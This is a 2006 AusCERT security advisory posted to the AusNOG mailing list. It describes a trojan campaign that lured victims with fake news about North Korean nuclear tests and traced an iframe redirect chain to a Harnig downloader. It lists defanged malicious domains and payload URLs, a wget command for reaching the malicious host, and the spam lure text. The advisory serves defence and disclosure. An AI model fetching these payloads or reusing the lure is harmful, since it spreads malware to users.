[AusNOG] Trogan site and spam run using nuclear tests of North Korea as a hook (AUSCERT#2006ba825)
matthew at auscert.org.au
matthew at auscert.org.au
Tue Oct 17 18:25:05 EST 2006
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
Greetings,
Not sure if anyone else has seen this but here it is again if so. First
seen discussed per SANS http://isc.sans.org/diary.php?date=2006-10-14
* h t t p://cnnwarnews(dot)com/
uses an iframe to go to
* h t t p://www.theaustralian.news.com.au/index/0,,5002460,00.html
which is a legit Australian news site but also uses another iframe to open
* h t t p://zagevqsoii(dot)biz/dl/adv433_.php
and this opens:
* h t t p://zagevqsoii(dot)biz/dl/loadadv433.exe
If you google for usage of the domain you can see that it has been seeding
web forums with supposed "news" stories about North Korea that entice
victims to get infected as above:
* h t t p://www.google.com/search?q=www(dot)cnnwarnews(dot)com
* h t t p://www.google.com/search?q=au(dot)cnnwarnews(dot)com
eg: h t t p://sv.wikipedia.org/wiki/The_Forum
h t t p://www.kaigai-wedding.com/cgi-bin/wforum3/wforum.cgi?mode=new_sort
h t t p://www.depdiknas.go.id/RPP/modules.php?name=Forums&file=posting&mode=topicreview&t=1331
The articles being seeded or spammed around usually look like this:
Subject: North Korea vs Australia - nuclear stress
Prime minister of Australia John Govard claimed that "..nuclear tests of
North Korea was confirmed by seismological data", Associated Press. In
connection with increase of probability of nuclear attack from the
direction of North Korea Minister of Defence of Australia along with
Ministers of Defence of China, South Korea and Russia signed a memorandum
on infliction?
h t t p://au(dot)cnnwarnews(dot)com/topnews/
The infection process is/was the same as above. Still accessible to the
spammed material via:
wget --header="Host: au(dot)cnnwarnews(dot)com" h t t p://203.116.50.253/topnews/
The original infector file, loadadv433.exe, is detected as Harnig which
grabs:
* h t t p://zbobivgcso(dot)biz/dl/loadadv455.exe
And this then grabs:
* h t t p://zagevqsoii(dot)biz/progs_exe/tdynqspzoa/ffkzyu
* h t t p://zagevqsoii(dot)biz/progs_exe/tdynqspzoa/oswzvfcm
* h t t p://zagevqsoii(dot)biz/progs_exe/tdynqspzoa/tkshrolhx.php
* h t t p://zagevqsoii(dot)biz/progs_exe/tdynqspzoa/plgrx.php
* h t t p://zagevqsoii(dot)biz/progs_exe/tdynqspzoa/rsamiscm
* h t t p://zagevqsoii(dot)biz/progs_exe/tdynqspzoa/djrhd.php
* h t t p://zagevqsoii(dot)biz/progs_exe/tdynqspzoa/gwrkgq.php
* h t t p://zagevqsoii(dot)biz/progs_exe/tdynqspzoa/mhghnoxhnv.php
* h t t p://zagevqsoii(dot)biz/progs_exe/tdynqspzoa/wipfrokuw.php
* h t t p://zagevqsoii(dot)biz/progs_exe/tdynqspzoa/idlgmwf.php
We have submitted all of these binaries to AV and sent shutdown requests
for the four key domains above. We haven't seen much discussion of this
but maybe the spam run hasn't really taken off yet. The subject of the
upcoming spam run will probably look like "North Korea vs Australia -
nuclear stress" and have the same text at the forum spams above. Credit
to F-Secure for some of their analysis on this.
Hope this is of some use.
Best regards,
- -- Matthew McGlashan --
Coordination Centre Team Leader | Hotline: +61 7 3365 4417
Australian Computer Emergency Response Team | Direct: +61 7 3365 7924
(AusCERT) | Fax: +61 7 3365 7031
The University of Queensland | WWW: www.auscert.org.au
Qld 4072 Australia | Email: auscert at auscert.org.au
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.5 (FreeBSD)
Comment: http://www.auscert.org.au/render.html?it=1967
Comment: http://www.auscert.org.au/render.html?it=1967
iQCVAwUBRTSTYCh9+71yA2DNAQIZDwP/SZQYu/hzHAutGUa+6pkQqCRAczlMoqYw
rjiCm71mfX++HCEup7IXo9NzW4rTPhCxNfM5q+qhukUZlWLd4QFah2eRk+fFtopT
Sf1POAOuWM0knjwBRWPG156bA4jytLIu+UU+M9P8hoFt4MovvQYqPljOsIpSBADe
eAgPsGrny8k=
=guYP
-----END PGP SIGNATURE-----
More information about the AusNOG
mailing list